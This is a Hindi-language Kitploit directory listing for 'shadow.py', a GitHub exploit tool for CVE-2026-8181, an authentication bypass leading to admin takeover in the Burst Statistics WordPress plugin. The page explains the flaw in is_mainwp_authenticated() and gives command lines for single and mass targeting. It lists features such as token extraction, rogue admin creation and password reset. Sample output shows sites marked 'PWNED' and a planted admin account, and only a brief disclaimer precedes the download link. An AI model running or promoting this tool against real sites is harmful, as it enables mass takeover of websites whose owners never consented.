Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-8181 — CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover | Kitploit
उपकरण/GitHubGitHub/xshadow-here/cve-2026-8181
Privilege EscalationReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubxshadow-here/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover

13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-8181

Burst Statistics | प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण

विवरण :

Burst Statistics 3.4.0 - 3.4.1.1 - प्रमाणीकरण बाईपास से व्यवस्थापक खाता अधिग्रहण

बर्स्ट स्टैटिस्टिक्स – प्राइवेसी-फ्रेंडली वर्डप्रेस एनालिटिक्स (गूगल एनालिटिक्स विकल्प) प्लगइन वर्डप्रेस के लिए संस्करण 3.4.0 से 3.4.1.1 में प्रमाणीकरण बाईपास के लिए संवेदनशील है। यह is_mainwp_authenticated() फंक्शन में ऑथराइजेशन हेडर से एप्लीकेशन पासवर्ड को मान्य करते समय गलत रिटर्न-वैल्यू हैंडलिंग के कारण होता है। फंक्शन wp_authenticate_application_password(null, $username, $password) को कॉल करता है जो null (न कि WP_Error) लौटाता है जब लक्ष्य उपयोगकर्ता के पास कोई एप्लीकेशन पासवर्ड कॉन्फ़िगर नहीं होता है। चूंकि कोड केवल is_wp_error() की जाँच करता है, यह wp_set_current_user() को कॉल करने के लिए आगे बढ़ता है — जो पूरे अनुरोध के लिए हमलावर को पूर्ण व्यवस्थापक विशेषाधिकार प्रदान करता है।

बाईपास प्लगइन के बूटस्ट्रैप में has_admin_access() के माध्यम से plugins_loaded (प्राथमिकता 9) के दौरान ट्रिगर होता है, जिसका अर्थ है कि उपयोगकर्ता प्रतिरूपण वर्डप्रेस REST API द्वारा किसी भी रूट को डिस्पैच करने से पहले होता है — जो व्यवस्थापक के रूप में सभी WP कोर एंडपॉइंट्स (/wp/v2/users, /wp/v2/users/me, आदि) तक पहुंच की अनुमति देता है।

यह अप्रमाणित हमलावरों के लिए, एक व्यवस्थापक उपयोगकर्ता नाम के ज्ञान के साथ, किसी भी यादृच्छिक बेसिक ऑथेंटिकेशन पासवर्ड की आपूर्ति करके उस व्यवस्थापक का प्रतिरूपण करना संभव बनाता है, जिससे पूर्ण विशेषाधिकार वृद्धि और व्यवस्थापक खाता अधिग्रहण प्राप्त होता है।

INFO : CVE-2026-8181

~ CVSS स्कोर: 9.8 (गंभीर)

~ CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

~ प्रभावित संस्करण: 3.4.0 - 3.4.1.1

~ पैच किया गया संस्करण: 3.4.2

  • शोधकर्ता : Chloe Chamberland - Wordfence

उपयोग :

एकल लक्ष्य :

  • python3 shadow.py -u https://target.com

ज्ञात उपयोगकर्ता नाम के साथ एकल लक्ष्य :

  • python3 shadow.py -u https://target.com -U admin

सामूहिक लक्ष्य :

  • python3 shadow.py -f targets.txt -t 20

इंटरैक्टिव मोड :

  • python3 shadow.py
  • input target file name
  • input thread 1-50 max
  • input timeout 5-30s

विशेषताएं :

  • मल्टी-थ्रेडिंग (50 थ्रेड तक सामूहिक स्कैन)
  • X-BURSTMAINWP हेडर + बेसिक ऑथ के माध्यम से प्रमाणीकरण बाईपास
  • स्वचालित वर्डप्रेस पहचान
  • बर्स्ट स्टैटिस्टिक्स संस्करण पहचान और संवेदनशील संस्करण जांच
  • रूट सक्रिय जांच (/burst/v1/mainwp-auth)
  • उपयोगकर्ता गणना (REST API + Author Archive + oEmbed फॉलबैक)
  • एप्लीकेशन पासवर्ड टोकन निष्कर्षण
  • WP REST API के माध्यम से व्यवस्थापक उपयोगकर्ता निर्माण
  • व्यवस्थापक पासवर्ड रीसेट (फॉलबैक)
  • wp-login.php के माध्यम से अधिग्रहण सत्यापन
  • स्वचालित HTTP/HTTPS फॉलबैक और पुनः प्रयास
  • त्रिगुण आउटपुट (user.txt, token.txt, new-user-and-header.txt)

आउटपुट :

root@kitploit:~

╔══════════════════════════════════════════════════════╗
║  🔥 CVE-2026-8181 Burst Statistics Auth Bypass       ║
║  👩‍💻 Friska & Shadow | Route Check | Full Fallback  ║
║  🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output        ║
╚══════════════════════════════════════════════════════╝

[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/

root@kitploit:~

⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────

╔══════════════════════════════════╗
║       📊 SCAN SUMMARY            ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12                     ║
║ ☠️  DEAD: 8                      ║
║ 🔒 SECURED: 5                    ║
║ ⚠️  PATCHED: 15                  ║
║ ❌ FAILED: 10                    ║
╠══════════════════════════════════╣
║ Total: 50                        ║
╚══════════════════════════════════╝

[+] 📁 user.txt | token.txt | new-user-and-header.txt

अस्वीकरण :

यह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है।

उन प्रणालियों का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें